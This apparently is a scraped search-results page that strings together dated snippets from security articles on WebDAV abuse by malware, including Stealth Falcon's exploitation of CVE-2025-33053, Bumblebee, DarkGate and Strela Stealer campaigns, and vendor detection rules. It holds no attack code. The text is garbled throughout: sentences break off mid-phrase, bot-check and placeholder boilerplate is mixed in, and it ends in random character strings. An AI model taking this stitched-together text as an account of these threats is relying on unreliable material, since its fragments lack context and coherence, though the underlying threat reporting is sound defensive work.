Webdav malware. It was being actively used by an APT group known as Stealth Falcon (also FruityArmor) in the Middle East. Sep 19, 2024 · This article delves into the use of WebDAV for malicious purposes, the range of malware distributed through this infrastructure, and the potential for this setup to be part of a broader “Infrastructure-as-a-Service” (IaaS) offering to cybercriminals. microsoft. Sep 19, 2024 · Detailed analysis of malware delivered via WebDAV Our analysis uncovered a wider range of malware distributed via this infrastructure than previously reported. The flowchart below outlines the stages of an infection via the search-ms protocol, custom WebDAV servers and the delivery of first and second-stage malware: MASEPIE, OCEANMAP and STEELHOOK respectively. WebDAV stands for "Web Distributed Authoring and Versioning," and it's a set of extensions to the HTTP protocol that allows users to access and edit files on a remote web server. Jun 10, 2025 · This latest campaign highlights the ongoing threat posed by sophisticated APT groups, which combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide. Bot VerificationVerifying that you are not a robot Jun 13, 2025 · A critical zero-day vulnerability in WebDAV implementations that enables remote code execution, with proof-of-concept exploit code now publicly available on GitHub. The malware families identified, such as SelfAU3, DarkGate, and Amadey, demonstrate the infrastructure’s versatility. Apr 8, 2024 · ANY. Jun 12, 2025 · The Stealth Falcon exploitation of Windows WebDAV (CVE-2025-33053) underscores an unpleasant but inescapable reality of today’s threat landscape: even trusted, built-in operating system utilities present avenues for remote, highly evasive compromise. bat files both use WebDAV to retrieve and run the malware. Feb 24, 2023 · The . . Bill Toulas September 18, 2023 12: Nov 26, 2024 · WebDAV extends HTTP protocol to facilitate remote content management, but improper implementation creates serious security vulnerabilities that attackers can exploit to compromise systems. Oct 30, 2024 · Our Threat Hunting Packages are specifically designed to detect suspicious remote WebDAV share access and file execution activities, such as those employed by the Strela Stealer malware. We wrote rules to detect malicious URL/LNK files, command line indicators, and network connections to WebDAV servers. Sep 18, 2023 · The malware loader 'Bumblebee' has broken its two-month vacation with a new campaign that employs new distribution techniques that abuse 4shared WebDAV services. Aug 29, 2024 · Learn how to defend yourself from the Voldemort malware campaign’s espionage with Proofpoint. Jun 25, 2025 · On June 10, 2025, Microsoft patched a zero-day flaw in WebDAV. Protect yourself from Chinese spyware threats. Jun 11, 2025 · An APT hacking group known as 'Stealth Falcon' exploited a Windows WebDav RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, Apr 8, 2024 · In this article, we looked at client-side exploitation techniques abusing WebDAV and LNK files to deliver malware. WebClient abuse (WebDAV) Theory Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs. RUN, the leading provider of an interactive malware analysis sandbox, has published a study on cyber attacks that leverage WebDAV, URLs, and LNK files to We would like to show you a description here but the site won’t allow us. com) The WebClient service needs to be enabled for WebDAV-based programs and features to Jun 11, 2025 · Microsoft has fixed the CVE-2025-33053 vulnerability in Web Distributed Authoring and Versioning (WebDAV), which allowed attackers to remotely execute arbitrary code on a victim's computer. url and . Jun 11, 2025 · Explore the details of CVE-2025-33053 vulnerability, an actively exploited zero-day flaw in WebDAV, with a deep analysis on SOC Prime blog. m6wyi cra2 kg vpreb mmxn snb jw cfvqabs ufv kn2if4u